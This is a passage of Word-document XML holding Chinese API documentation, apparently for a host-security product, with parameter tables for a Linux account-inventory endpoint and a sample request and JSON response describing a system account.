            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04438DF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EA9005D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="247FB0E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51B23B79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="756F2EE7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50B1C8D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F71AA8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56A8DF01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="278005E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7628EE15" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="456758C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28C532FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3042014F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F38EEAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5F403A1A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B42A56D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66D0FB92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A4FF9FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6936329A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>帐号</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">状态 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 账号状态，1:启用，0:禁用 ；windows 账号状态，0:启用，2:禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="57BB493C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E01D076" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66A7109D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32353765" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E9AE7CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>账号名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="34B61418" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46F5719E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>home</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="511486AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B7F713E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03281B90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>home目录（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="701A2BC7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="482D99B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastLoginTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="186EC66B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CBEAE8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3AE2C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最后一次登录时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0C78979F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="370E6270" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>gid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DE320F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D74084E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="776F861A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="736A67B9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="095D7220" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60EFF46A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70806896" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="093939C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="541A1BA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A3511A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/account/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux?agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=70db8ef89e9ae79a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6B02D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305925B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "internalIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId":39,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remark":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test-test000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname":"qingteng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "uid":116,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "gid":65534,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "groups":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nogroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kernoops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "home":"/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "shell":"/bin/false",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"root": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "lastLoginTime":"1970-01-01 08:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pwdMaxDays":99999,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwdMinDays</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":-1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pwdWarnDays":7,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "loginStatus":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshAcl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudoAccesses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comment":"Kernel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Oops Tracking Daemon,,,",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastLoginTty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastLoginIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "expireTime":"1969-12-31 08:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>expired":false</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>description":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastChangPwdTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2017-09-04 08:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accountLoginType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>interactiveLoginType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwordInactiveDays</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authorizedKeys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encryptType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh-dss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "comment": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@centos-master</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "value": "AAAAB3Nz...+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fgkXA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>==",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "md5": "36e4313ab5b1aae15ff0f1948a4d73ea"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670879BA"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2355"/>
        <w:gridCol w:w="1081"/>
        <w:gridCol w:w="3232"/>
        <w:gridCol w:w="3414"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A74CE9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B32C0C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="751A0421" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="021D5988" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B006D7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="66154D02" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E257B14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EEF5F0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="501E0C5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
